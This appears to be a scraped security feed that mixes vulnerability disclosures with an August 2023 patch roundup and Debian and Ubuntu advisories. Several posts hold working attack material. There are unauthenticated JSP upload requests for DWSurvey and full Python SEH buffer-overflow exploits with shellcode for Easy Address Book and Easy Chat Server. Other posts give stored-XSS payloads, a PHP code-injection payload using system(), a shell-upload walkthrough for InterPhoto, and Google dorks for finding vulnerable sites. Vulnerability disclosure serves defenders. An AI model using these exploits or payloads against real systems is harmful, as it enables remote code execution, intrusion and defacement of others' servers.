File Upload vulnerability in DWSurvey DWSurvey-OSS v.3.2.0 and before allows a remote attacker to execute arbitrary code via the saveimage method and savveFile in the action/UploadAction.java file.

\`\`The saveimage method and saveFile in the com/key/common/base/action/UploadAction.java file can directly upload any type of file without authorization

For the saveimage method, this method can be directly called without authorization to upload any specified type of file to the /file/images/ directory, and this directory can be accessed through a browser normally, so malicious files can be uploaded for remote code execution

  
\`POST /diaowen/up/upload!saveimage.action HTTP/1.1  
Host:  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0  
Connection: close  
Content-Length: 395  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary12345abcde  
Accept-Encoding: gzip, deflate

\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="uploadify"; filename="1.jsp"  
Content-Type: image/jpeg

testnixxx  
\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="uploadifyFileName"

1.jpg  
\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="uploadifyContentType"

image/jpeg  
\------WebKitFormBoundary12345abcde--  
\`  
  

Similarly, for the saveFile method, this method can also be directly called without authorization to upload any specified type of file to the directory specified by basepath under the /file directory, and this directory can be accessed through the browser normally, so malicious files can be uploaded file for remote code execution

  
\`POST /diaowen/up/upload!saveFile.action HTTP/1.1  
Host:  
User-Agent: Mozilla/5.0  
Connection: close  
Content-Length: 489  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary12345abcde  
Accept-Encoding: gzip, deflate

\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="basepath"

files  
\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="uploadify"; filename="1.jsp"  
Content-Type: image/jpeg

testnixxx  
\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="uploadifyFileName"

1.jpg  
\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="uploadifyContentType"

image/jpeg  
\------WebKitFormBoundary12345abcde--  
\`

CVE-2023-40980: Arbitrary file uploads exist · Issue #107 · wkeyuan/DWSurvey

Easy Address Book Web Server version 1.6 suffers from buffer overflow and cross site scripting vulnerabilities.

# Exploit Title: Easy Address Book Web Server v1.6 - MultipleVulnerabilities# Discovery by: Rafael Pedrero# Discovery Date: 2021-01-10# CVE: CVE-2023-4491, CVE-2023-4492, CVE-2023-4493# Vendor Homepage: http://www.efssoft.com/web-address-book-server.html# Software Link : http://www.efssoft.com/eabws.exe (md5sum:69f77623bb32589fb5343f598b61bbd9)# Tested Version: 1.6# Tested on:  Windows 7, 10# CVE-2023-4491: Vulnerability Type: searchbook Remote Buffer OverflowCVSS v3: 9.8CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HCWE: CWE-119Vulnerability description: There is a remote stack-based buffer overflow(SEH) in /searchbook.ghp in EFS Software Easy Address Book Web Server 1.6.By sending an overly long username string to /searchbook.ghp for asking thename via POST, an attacker may be able to execute arbitrary code.Proof of concept:import socketimport structdef sendbuff():    # > arwin.exe kernel32.dll WinExec    # WinExec is located at 0x776f2c91 in kernel32.dll    shellcode_WinExec = ("\x33\xc0"                          # XOR EAX,EAX"\x50"                              # PUSH EAX      => padding for lpCmdLine"\x68\x2E\x65\x78\x65"              # PUSH ".exe""\x68\x63\x61\x6C\x63"              # PUSH "calc""\x8B\xC4"                          # MOV EAX,ESP"\x6A\x01"                          # PUSH 1"\x50"                              # PUSH EAX"\xBB\x91\x2c\x6f\x77"              # MOV EBX,kernel32.WinExec"\xFF\xD3")                         # CALL EBX    shellcode_system = (        "\x31\xC9"                # xor ecx,ecx        "\x51"                    # push ecx        "\x68\x63\x61\x6C\x63"    # push 0x636c6163        "\x54"                    # push dword ptr esp        "\xB8\x6f\xb1\xdc\x75"    # mov eax,msvcrt.system        "\xFF\xD0")               # call eax    shellcode = shellcode_WinExec    # SEH    junk1 = "A"*455    buffer =  junk1    buffer += "\xeb\x10\x90\x90"            # jmp 0x10 to nops to shellcode    buffer +=  struct.pack('<L',0x1001071e) # pop/pop/ret @ 0x1001071eSSLEAY32.DLL from !Mona 0x1001071e    buffer += "\x90" * 20    buffer += shellcode    junk2 =  "D"*(840 - 455 - len(shellcode) - 4 - 4 - 20)    buffer += junk2    return bufferdef REQ_POST (padding):    POST = (    "POST http://"+str(ip)+"/searchbook.ghp?id=1 HTTP/1.1\r\n"    "User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0\r\n"    "Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"    "Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3\r\n"    "Content-Type: application/x-www-form-urlencoded\r\n"    "Content-Length: " + str(108 + len(padding))+ "\r\n"    "Connection: keep-alive\r\n"    "Referer: http://"+str(ip)+"/searchcontact.ghp?id=1\r\n"    "Cookie: SESSIONID=3938; UserID=; PassWD=\r\n"    "Upgrade-Insecure-Requests: 1\r\n"    "Host: "+str(ip)+"\r\n\r\n"    "addrbookid=1&contactid=%3C%21--cid--%3E&cancelflag=0&name=" + padding+"&cancelflag=0&name=AAA&Email=&address=&phone=&other=&search=Start+Search\r\n\r\n"    )    return POSTip = '192.168.X.X'port = 80payload = sendbuff()try:    print "\n[*] Sending POST (searchbook.ghp) exploit to Easy Address BookWeb Server V1.6, length " + str(len(payload))    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.connect((ip, port))    s.send(REQ_POST(payload))    s.recv(1024)    s.close()    print "\n[*] Sended POST length " + str(len(payload))except:    print "Connecting error"# CVE-2023-4492: Vulnerability Type: stored Cross-Site Scripting (XSS) - #1CVSS v3: 6.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-79Vulnerability description: Easy Address Book Web Server v1.6, does notsufficiently encode user-controlled inputs, resulting in a storedCross-Site Scripting (XSS) vulnerability via the /addrbook.ghp (POSTmethod), in multiple parameters.Proof of concept:POST http://localhost/addrbook.ghp?id=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 475Origin: http://localhostConnection: keep-aliveReferer: http://localhost/editcontact.ghp?id=1&cid=12Cookie: SESSIONID=15337; UserID=; PassWD=Upgrade-Insecure-Requests: 1Host: localhostaddrbookid=1&contactid=14&cancelflag=0&firstname=%3C%2Fa%3E%3Cscript%3Ealert%2811%29%3B%3C%2Fscript%3E%3Ca%3E&middlename=demo1&lastname=demo1&nickname=demo1&Email=demo1%40demo1.com&company=demo1&jobtitle=demo1&department=demo1&office=demo1&workphone=&workfax=&workaddress=demo1&workcity=&workstate=&workzip=&workcountry=USA&homephone=&homefax=&homeaddress=demo1&homecity=&homestate=&homezip=&homecountry=USA&mobilephone=&pager=&email2=&email3=&homepage=&notes=demo1&save=SaveVulnerable parameters: firstname, homephone, lastname, middlename,workaddress, workcity, workcountry, workphone, workstate, workzipResponse: <TR>              <TD class=row2><SPAN class=genmed><A target=_blankclass=genmed href="viewcontact.ghp?id=1&cid=12">demo1</a><script>alert(1);</script><a> demo1</A></SPAN></TD>              <TD class=row2 align=left><SPAN class=genmed><a href="mailto:demo1@demo1.com">demo1@demo1.com</a></SPAN></TD>              <TD class=row2 align=left><SPAN class=genmed></SPAN></TD>              <TD class=row2 align=left><SPAN class=genmed></SPAN></TD>              <TD class=row2 align=left><SPAN class=genmed>demo1, , , ,USA</SPAN></TD>              <TD class=row2 align=left><SPAN class=genmed><ahref="editcontact.ghp?id=1&cid=12">Edit</a></SPAN></TD>              <TD class=row2 align=left><SPAN class=genmed><ahref="javascript:deletecontact('deletecontact.ghp?id=1&cid=12','demo1</a><script>alert(1);</script><a> demo1')">Delete</a></SPAN></TD># CVE-2023-4493: Vulnerability Type: stored Cross-Site Scripting (XSS) - #2CVSS v3: 6.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-79Vulnerability description: Easy Address Book Web Server v1.6, does notsufficiently encode user-controlled inputs, resulting in a storedCross-Site Scripting (XSS) vulnerability via the /users_admin.ghp (POSTmethod, authenticated Admin user), in multiple parameters.Proof of concept:Example 1:POST http://localhost/users_admin.ghp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 134Origin: http://localhostConnection: keep-aliveReferer: http://localhost/users_admin.ghpCookie: SESSIONID=19655; UserID=Admin; PassWD=<redacted>Upgrade-Insecure-Requests: 1Host: localhostuserid=2&username=test&password=test&email=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&level=user&state=Enable&update_user=UpdateVulnerable parameter: emailResponse:<form method="POST" action=""><TR><input type="hidden" name="userid" value="2"><TD class=row2 align=left><input type="text" name="username" size="15"value="test"> </TD><TD class=row2 align=left><input type="text" name="password" size="15"value=""> </TD><TD class=row2 align=left><input type="text" name="email" size="35"value=""><script>alert(1);</script>"> </TD><TD class=row2 align=left><select name="level"><option>guest</option><option selected>user</option><option >poweruser</option></select></TD><TD class=row2 align=left><select name="state"><optionselected>Enable</option><option >Disable</option></select></TD><TD class=row2 align=left><input type="submit" value="Update"name="update_user"></TD><TD class=row2><SPAN class=genmed><A class=genmedhref="user_delete_admin.ghp?2">Delete</A></SPAN></TD></TR></form>Example 2:POST http://localhost/users_admin.ghp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 144Origin: http://localhostConnection: keep-aliveReferer: http://localhost/users_admin.ghpCookie: SESSIONID=19655; UserID=Admin; PassWD=<redacted>Upgrade-Insecure-Requests: 1Host: localhostuserid=2&username=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&password=test&email=tt%40fsdfs.com&level=user&state=Enable&update_user=UpdateVulnerable parameter: usernameResponse:<form method="POST" action=""><TR><input type="hidden" name="userid" value="2"><TD class=row2 align=left><input type="text" name="username" size="15"value=""><script>alert(1);</script>"> </TD><TD class=row2 align=left><input type="text" name="password" size="15"value=""> </TD><TD class=row2 align=left><input type="text" name="email" size="35" value="tt@fsdfs.com"> </TD><TD class=row2 align=left><select name="level"><option>guest</option><option selected>user</option><option >poweruser</option></select></TD><TD class=row2 align=left><select name="state"><optionselected>Enable</option><option >Disable</option></select></TD><TD class=row2 align=left><input type="submit" value="Update"name="update_user"></TD><TD class=row2><SPAN class=genmed><A class=genmedhref="user_delete_admin.ghp?2">Delete</A></SPAN></TD></TR></form>-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------# Exploit Title: Easy Chat Server v3.1 - Multiple Vulnerabilities# Discovery by: Rafael Pedrero# Discovery Date: 2021-01-09# CVE: CVE-2023-4494, CVE-2023-4495, CVE-2023-4496, CVE-2023-4497# Vendor Homepage: http://www.echatserver.com/# Software Link : http://echatserver.com/ecssetup.exe (md5sum:c682138ebbea9af7948a3f142bbd054b)# Tested Version: 3.1# Tested on:  Windows 7, 10# CVE-2023-4494: Vulnerability Type: register Remote Buffer OverflowCVSS v3: 9.8CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HCWE: CWE-119Vulnerability description: There is a remote stack-based buffer overflow(SEH) in register.ghp in EFS Software Easy Chat Server versions 2.0 to 3.1.By sending an overly long username string to register.ghp for asking theusername via GET, an attacker may be able to execute arbitrary code.Proof of concept:import socketdef sendbuff():    # calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/    # msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin    # [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1)    shellcode = (    "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +    "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +    "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +    "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +    "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +    "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +    "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +    "\x1c\x39\xbd"    )    # SEH    junk1 = "A"*473    buffer =  junk1    buffer += "\xeb\x06\x90\x90"           # short jmp to shellcode    buffer += "\x1e\x0e\x01\x10"           # pop/pop/ret @ 0x10010E1ESSLEAY32.DLL from !Mona    buffer += shellcode    junk2 =  "D"*(600 - 473 - len(shellcode) - 4 - 4)    buffer += junk2    return bufferdef REQ_GET (padding):    GET = (    "GET /register.ghp?username=" + padding + "&password= HTTP/1.1\r\n"    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/86.0.4240.75 Safari/537.36\r\n"    "Host: "+str(ip)+":80\r\n"    "Accept-Language: es-es\r\n"    "Accept-Encoding: gzip, deflate\r\n"    "Referer: http://"+str(ip)+"\r\n"    "Connection: Keep-Alive\r\n\r\n"    )    return GETip = '192.168.X.X' # change the ip addressport = 80payload = sendbuff()try:    print "\n[*] Sending GET (register.ghp) exploit to EFS Easy Chat Server3.1, length " + str(len(payload))    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.connect((ip, port))    s.send(REQ_GET(payload))    s.recv(1024)    s.close()    print "\n[*] Sended GET length " + str(len(payload))except:    print "Connection error"# CVE-2023-4495: Vulnerability Type: stored Cross-Site Scripting (XSS) - #1CVSS v3: 6.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-79Vulnerability description: Easy Chat Server v3.1, does not sufficientlyencode user-controlled inputs, resulting in a stored Cross-Site Scripting(XSS) vulnerability via the /registresult.htm (POST method), in Resumeparameter. The XSS is loaded from /register.ghp.Proof of concept:POST http://localhost/registresult.htm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 257Origin: http://localhostConnection: keep-aliveReferer: http://localhost/register.ghp?username=<redacted>&password=<redacted>Upgrade-Insecure-Requests: 1Host: localhostUserName=<redacted>&Password=<redacted>&Password1=demo1&Sex=0&Email=demo1%25252540demo1.com&Icon=0.gif&Resume=%3C%2FTEXTAREA%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3CTEXTAREA%3E&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=ChangeResponse<BODY bgcolor="#b8d0dc"><center>Congratulations! Your information has beenchanged successfully.</center></body>Go to:http://localhost/register.ghp?username=<redacted>&password=<redacted>Response - xss:<TR><TD>Your profile/interests:<BR><TEXTAREA rows="4" cols="30"name="Resume"></TEXTAREA><script>alert(1)</script><TEXTAREA></TEXTAREA><INPUT type="hidden" name="cw" value="0"><INPUT type="hidden" name="RoomID" value=""><INPUT type="hidden" name="RepUserName" value=""></TD></TR># CVE-2023-4496: Vulnerability Type: stored Cross-Site Scripting (XSS) - #2CVSS v3: 6.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-79Vulnerability description: Easy Chat Server v3.1, does not sufficientlyencode user-controlled inputs, resulting in a stored Cross-Site Scripting(XSS) vulnerability via the /body2.ghp (POST method), in mtowho parameter.Proof of concept:POST http://localhost/body2.ghp?username=<redacted>&password=<redacted>&room=4HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 248Origin: http://localhostConnection: keep-aliveReferer: http://localhost/chatsubmit.ghp?username=<redacted>&password=<redacted>&room=4Upgrade-Insecure-Requests: 1Host: localhoststaticname=%3A000539&tnewname=&msayinfo=demo+&mnewname=&mtowho=%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cscript%3E&mfilters=0&mfont=0&mfcolor=1&elist=100&seltype=Theme&msg=&Submit=Send&sc=on&notifysound=on&message=demo+&chat_flag=Response:<html><head></head><body><script language="JavaScript"></script></body></html># CVE-2023-4497: Vulnerability Type: stored Cross-Site Scripting (XSS) - #3CVSS v3: 6.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-79Vulnerability description: Easy Chat Server v3.1, does not sufficientlyencode user-controlled inputs, resulting in a stored Cross-Site Scripting(XSS) vulnerability via the /registresult.htm (POST method), in Iconparameter. The XSS is loaded from /users.ghp.Proof of concept:POST /registresult.htm HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 235Origin: http://localhostConnection: closeReferer: http://localhost/register.ghp?username=<redacted>&password=<redacted>Upgrade-Insecure-Requests: 1UserName=<redacted>&Password=<redacted>&Password1=<redacted>&Sex=0&Email=<redacted>%252525252540<redacted>.com&Icon="><script>alert(111)</script><img%20src="1.gif&Resume=AAA&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=ChangeResponse:<BODY bgcolor="#b8d0dc"><center>Congratulations! Your information has beenchanged successfully.</center></body>When user information page load:http://localhost/users.ghp?username=<redacted>&password=<redacted>&room=4&nbsp;<font color="red">[vip room]</font><br><br>[Online users:1]<br><br>[<ahref="javascript:parent.chatsubmit.getname('All');"target="chatsubmit">All</a>]<br><br><script>if(navigator.appName!="Netscape" && parent.chatsubmit.document &&parent.chatsubmit.document.readyState == "complete")parent.chatsubmit.listcolorchange();</script><img src="/images/""><script>alert(111)</script><i>[<ahref="javascript:parent.chatsubmit.getname('<redacted>');"target="chatsubmit"><redacted></a>]<==<br><br><br><br>[<a href="javascript:OnRegister();">Change infomation</a>]</i>

Easy Address Book Web Server 1.6 Buffer Overflow / Cross Site Scripting

Debian Linux Security Advisory 5485-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5485-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
August 30, 2023                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : firefox-esr  
CVE ID         : CVE-2023-4573 CVE-2023-4574 CVE-2023-4575 CVE-2023-4581   
                 CVE-2023-4584

Multiple security issues have been found in the Mozilla Firefox  
web browser, which could potentially result in the execution  
of arbitrary code.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 102.15.0esr-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 102.15.0esr-1~deb12u1.

We recommend that you upgrade your firefox-esr packages.

For the detailed security status of firefox-esr please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/firefox-esr

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTvgbMACgkQEMKTtsN8  
TjYyYQ/5AXRB+aU6RXtKeVkBOmIZpPzJPaSpdRNJ1YUK+V4yn9Pfsyowi+KWcGGw  
pp84zjhSlkc3ewNWvcMhyKyEB7wWRhnDE/VyxmdpxsS4CydkZc8RecLxU8B9Kddy  
qkvuXoYlFjE9fitqgU2eT0plrkJTImH6dbr6klmDqK+yQu3wl/penpMxxJEJgOWo  
oKiLe5asJJrtjVcUMrHs9CO2YspXcvlj4IBIqEfwz8FrVX0R+uMZrFARPbC6nHkv  
HJ/CUXSv3dIGEjl6opFjGDNKkBpO2ZwB9K3HBxmD320jLUgkRwKCCvyr1g+ZfcBt  
WwEwy/dE3fNJkLU5VlDdzY8O5CG4+OeP4QdICaSVqoVE1PfRX+trriAsWjENLm6o  
aWu1FLqMLvPiyRGz1d3QNeSMOvYG3czycGH5nEMWztBDFDJ+xWBZ57xUcT5xTIZb  
zWz+1ZL1rYaIrNPGC1nFcX5uHnnf7rzNjl0H18+FEudUwhzKUDdLxoMWqXJVtju2  
+YlY2OqKRQH8hrhVVuxv+L3oYF+jjQB/4hL1BrjB13K1Bqffeq5zSyKes7UfZ1AZ  
cSUVUsr3RKpCO7J+5lPOZqrThSBG3DWmmCBdl1AkZW4mv/g19EssM6zANYmZHzn8  
MyyqcIGdT0srUNECfrXzSFQ7ZhpTKAvCYt2wzrQhOsb7hxP4sa8=  
=s7Qw  
-----END PGP SIGNATURE-----

Debian Security Advisory 5485-1

Innovins CMS version 4.7 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Innovins CMS v4.7 Sql Injection Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.innovins.com/                                                                                          || # Dork      : intext:Developed by - Innovins                                                                                     |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : events2.php?id= [+] http://www.127.0.0.1saingoorg/events2.php?id= <===== inject herGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Innovins CMS 4.7 SQL Injection

Islam CMS version 1.0 suffers from a remote PHP code injection vulnerability.

    ====================================================================================================================================| # Title     : islam cms v1.0 PHP code injection Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://almohtaref.net/                                                                                            || # Dork      : R.I.P                                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This vulnerability affects /islamcms/index.php [+] In the search box use payload :     http://127.0.0.1/islamcms/index.php?name=search    ${@system(dir)}    ${@print inoushka}    word=%24%7b%40print indoushka}%7dGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Islam CMS 1.0 Code Injection

Invasor Diagonal CMS version 1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Invasor Diagonal CMS 1.0 XSS Vulnerability                                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://invasordiagonal.com                                                                                        |  | # Dork      : intext:''web development // invasor diagonal''                                                                     |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /eventos.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3E[+]  http://target_site/eventos.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Invasor Diagonal CMS 1.0 Cross Site Scripting

InterPhoto version 2.3.0 suffers from a remote shell upload vulnerability.

    ====================================================================================================================================| # Title     : InterPhoto 2.3.0 Persians Remote Shell Upload vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://www.dl.persianscript.ir/script/InterPhoto_2.3.0_Persians(PersianScript.ir).zip                              || # Dork      : InterPhoto 2.3.0                                    '                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Register an Account : http://site/register.php  [+] Upload the shell.php instead of your photo (shell.php.jpg) : http://site/mydesk.upload.php[+] so rename shell.php.jpg to shell.php by Live HTTP Headers.(Mozilla FireFox Add-ons)  [+] Locate the shell in this route : http://site/MyWebsiteImages/XX/original/YY.php  [+] XX=Name of This Folder Like This Pattern : Year_Month_RandomChar(Sample : 2012_10_oZUGCD7IP81I)  [+] YY=Name of Shell.(Renamed to Random Char)Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

InterPhoto 2.3.0 Shell Upload

Plus: Mozilla patches more than a dozen vulnerabilities in Firefox, and enterprise companies Ivanti, Cisco, and SAP roll out a slew of updates to get rid of some high-severity bugs.

August has ended the summer in style with multiple patches issued by Microsoft, Google Chrome, and its competitor Firefox to fix serious issues, some of which are being used in attacks.

While there was no Apple iPhone update at the time of writing, some major enterprise fixes were released during the month. These include patches for exploited flaws in Ivanti products, as well as fixes for vulnerabilities in SAP and Cisco software.

Read on for everything you need to know about the patches issued in August.

Microsoft

Microsoft’s August Patch Tuesday saw the software giant fixing dozens of vulnerabilities, including two already being used in real-world attacks. The first is a Defense in Depth update to CVE-2023-36884, a remote code execution (RCE) flaw in Windows Search that could allow attackers to bypass Microsoft’s Mark of the Web security feature. If it sounds familiar, that’s because Microsoft already fixed the vulnerability in July. But installing the latest update “stops the attack chain” leading to the issue, Microsoft said.

The second flaw, CVE-2023-38180 is an issue in .NET and Visual Studio that could allow an adversary to perform denial of service.

Six of the issues fixed in August’s Patch Tuesday are rated as critical, including CVE-2023-36895—an RCE flaw in the Outlook email client. Meanwhile, CVE-2023-35385, CVE-2023-36910, and CVE-2023-36911 are RCE issues in the Microsoft Message Queuing service, according to the Security Update Guide.

The fifth and sixth critical issues fixed by Microsoft in August are CVE-2023-29328 and CVE-2023-29330, both of which are RCE flaws in Teams.

Google Chrome

August kicked off with a slew of updates for Chrome 115 including nine rated as having a high impact. The 17 patches include three type-confusion flaws in V8: CVE-2023-4068, CVE-2023-4069, and CVE-2023-4070. And CVE-2023-4071 is a heap buffer overflow issue in Visuals and CVE-2023-4076 is a use-after-free flaw in WebRTC.

A couple of weeks later, Google issued Chrome 116 to patch 26 vulnerabilities, eight of which are rated as having a high impact. The most serious issues include CVE-2023-2312—a use-after-free bug in Offline—and CVE-2023-4349, a use-after-free flaw in Device Trust Connectors. A third, CVE-2023-4350, is an inappropriate implementation bug in Fullscreen.

Then, on August 23, Google released the first of its more regular weekly security updates, patching five flaws. The four vulnerabilities rated as having a high impact include two use-after-free bugs and two out-of-bounds memory access issues.

Firefox

Google Chrome’s privacy-focused competitor Firefox also had a hectic August, fixing more than a dozen vulnerabilities in Firefox 116. The issues patched by Firefox owner Mozilla include CVE-2023-4045, an issue in Offscreen Canvas rated as high, and CVE-2023-4047, a bug in popup notifications delay calculation that could allow an attacker to trick a user into granting permissions.

The update also patches memory safety bugs tracked as CVE-2023-4056, CVE-2023-4057, and CVE-2023-4058. The flaws fixed in the latest update “showed evidence of memory corruption,” Mozilla said. “We presume that with enough effort, some of these could have been exploited to run arbitrary code.”

Google Android

Google has issued 40 updates for its Android operating system including patches for serious flaws in the Framework, System, and Kernel. Tracked as CVE-2023-21273, the most severe bug fixed in August is a critical security vulnerability in the System component that could lead to RCE with no additional execution privileges needed. User interaction is not required for exploitation, Google said in its Android Security Bulletin.

Meanwhile, CVE-2023-21282 is an RCE flaw in the Media Framework also marked as having a critical impact. Another critical issue in the Kernel, tracked as CVE-2023-21264, could lead to local escalation of privilege, although System execution privileges are needed.

Google Fixes Serious Security Flaws in Chrome and Android

Ubuntu Security Notice 6320-1 - Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. Lukas Bernhard discovered that Firefox did not properly manage memory when the "UpdateRegExpStatics" attempted to access "initialStringHeap". An attacker could potentially exploit this issue to cause a denial of service.

